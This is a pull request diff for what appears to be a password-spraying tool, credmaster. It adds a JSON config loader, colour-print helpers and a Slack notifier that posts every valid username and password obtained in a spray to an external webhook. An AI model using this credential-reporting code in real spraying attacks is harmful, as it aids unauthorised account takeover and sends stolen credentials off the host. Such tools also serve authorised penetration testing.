--- a/utils/json_helper.py
+++ b/utils/json_helper.py
@@ -12,7 +12,6 @@ def get_path():
 	cwd = os.getcwd()
 	#cwd = Path(__file__).resolve().parent[1]
 	cwd = str(cwd)
-	print(cwd)
 	return cwd
 
 

--- a/utils/json_helper.py
+++ b/utils/json_helper.py
@@ -1,0 +1,46 @@
+import json
+
+from pathlib import Path
+
+# Json functions for reading slack notifier input
+def get_path():
+	"""
+	A function to get the current path to bot.py
+
+	Returns:
+	 - cwd (string) : Path to bot.py directory
+	"""
+	cwd = Path(__file__).parent.parent.parent
+	#cwd = Path(__file__).resolve().parent[1]
+	cwd = str(cwd)
+	print(cwd)
+	return cwd
+
+
+def read_json(filename):
+	"""
+	A function to read a json file and return the data.
+
+	Params:
+	 - filename (string) : The name of the file to open
+
+	Returns:
+	 - data (dict) : A dict of the data in the file
+	"""
+	cwd = get_path()
+	with open(cwd + "/" + filename + ".json", "r") as file:
+		data = json.load(file)
+	return data
+
+
+def write_json(data, filename):
+	"""
+	A function used to write data to a json file
+
+	Params:
+	 - data (dict) : The data to write to the file
+	 - filename (string) : The name of the file to write to
+	"""
+	cwd = get_path()
+	with open(cwd + "/" +  filename + ".json", "w") as file:
+		json.dump(data, file, indent=4)

--- a/utils/utils.py
+++ b/utils/utils.py
@@ -1,6 +1,12 @@
 import random, requests
 from utils.ntlmdecode import ntlmdecode
+import json
+from utils.json_helper import read_json
+from datetime import datetime
 
+# We can set anything up here for easy parsing and access later, for the moment this only houses the slack webhook, can probably add discord and other platforms at a later date as parsing isn't an issue.
+
+configvars = read_json("config-vars")
 
 def generate_ip():
 
@@ -49,3 +55,28 @@ def get_owa_domain(url, uri, useragent):
         return ntlm_info["NetBIOS_Domain_Name"]
     else:
         return "NOTFOUND"
+
+# Function for posting username/password to slack channel
+def slacknotify(username, password):
+    now = datetime.now()
+    webhook_url = configvars["slack_webhook"]
+    message = {"text": '```[PASSWORD SPRAY]\nUser: ' + username + '\nPass: ' + password + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    response = requests.post(
+        webhook_url, data=json.dumps(message),
+        headers={'Content-Type': 'application/json'}
+    )
+
+# Function for debug messages 
+def slackupdate(update_msg):
+    now = datetime.now()
+    webhook_url = configvars["slack_webhook"]
+    message = {"text": '```[DEBUG MESSAGE]\n' + update_msg + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    response = requests.post(
+        webhook_url, data=json.dumps(message),
+        headers={'Content-Type': 'application/json'}
+    )
+
+# Colour Functions - ZephrFish
+def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
+def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
+def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))

--- a/utils/utils.py
+++ b/utils/utils.py
@@ -60,23 +60,28 @@ def get_owa_domain(url, uri, useragent):
 def slacknotify(username, password):
     now = datetime.now()
     webhook_url = configvars["slack_webhook"]
-    message = {"text": '```[PASSWORD SPRAY]\nUser: ' + username + '\nPass: ' + password + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    message = {"text": '```[Valid Credentials Obtained!]\nUser: ' + username + '\nPass: ' + password + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
     response = requests.post(
         webhook_url, data=json.dumps(message),
         headers={'Content-Type': 'application/json'}
     )
 
 # Function for debug messages 
-def slackupdate(update_msg):
+def slacklog(slacklog_msg):
     now = datetime.now()
     webhook_url = configvars["slack_webhook"]
-    message = {"text": '```[DEBUG MESSAGE]\n' + update_msg + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    message = {"text": '```[Log Entry]\n' + slacklog_msg + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
     response = requests.post(
         webhook_url, data=json.dumps(message),
         headers={'Content-Type': 'application/json'}
     )
 
 # Colour Functions - ZephrFish
-def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
-def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
-def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
+def prRed(skk): 
+    return "\033[91m {}\033[00m" .format(skk)
+
+def prGreen(skk): 
+    return "\033[92m {}\033[00m" .format(skk)
+
+def prYellow(skk): 
+    return "\033[93m {}\033[00m" .format(skk)


### PR DESCRIPTION
tidied up some of the code, added in slack notifier and how to configure. Tested in a live environment, and all confirmed working. To use colours in new templates simply upon success or failure, do:

`utils.prGreen("Success!") # This will print out the work success in Green`; likewise, you can do `utils.prRed("Failed :(") # This will print out Failed in red.`

To use slack, populate your webhook URL in the config-vars.json file, credmaster will load this and send updates into the channel with usernames and passwords that are valid etc. 